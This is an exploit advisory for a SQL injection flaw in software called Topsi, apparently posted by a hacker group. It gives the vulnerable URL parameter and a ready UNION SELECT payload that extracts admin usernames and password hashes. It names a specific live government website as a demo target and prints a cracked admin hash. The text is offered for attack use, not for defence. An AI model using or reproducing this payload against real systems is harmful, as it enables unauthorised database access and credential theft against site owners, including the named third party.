Topsi suffers from a remote SQL injection vulnerability.
0bdd50a58871b9212c4dca5922a1ac8033fef5cb3b96f401a210f2bd28435ee1
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[ topsi injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://Skote-Vahshat.com] /*
\* [Archive] :[Http://xpl.skote-vahshat.com] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
=======================================================================
/* [+]Exploit :
/* http://www.target.com/news_show.php?id=[SQLi]
/* [+]Demo:
/* http://www.szwzfy.gov.cn/news_show.php?id=127[SQLi]
/* [+]injection
/* -127+union+select+1,name,adminpass,4,5,6,7,8,9,10,11,12,13+from+admin
/* [+]crack hash
/* 21232f297a57a5a743894a0e4a801fc3 ( admin)
=======================================================================
|_***_| special thanks : bl4ck.viper all turkiS hackers|
=======================================================================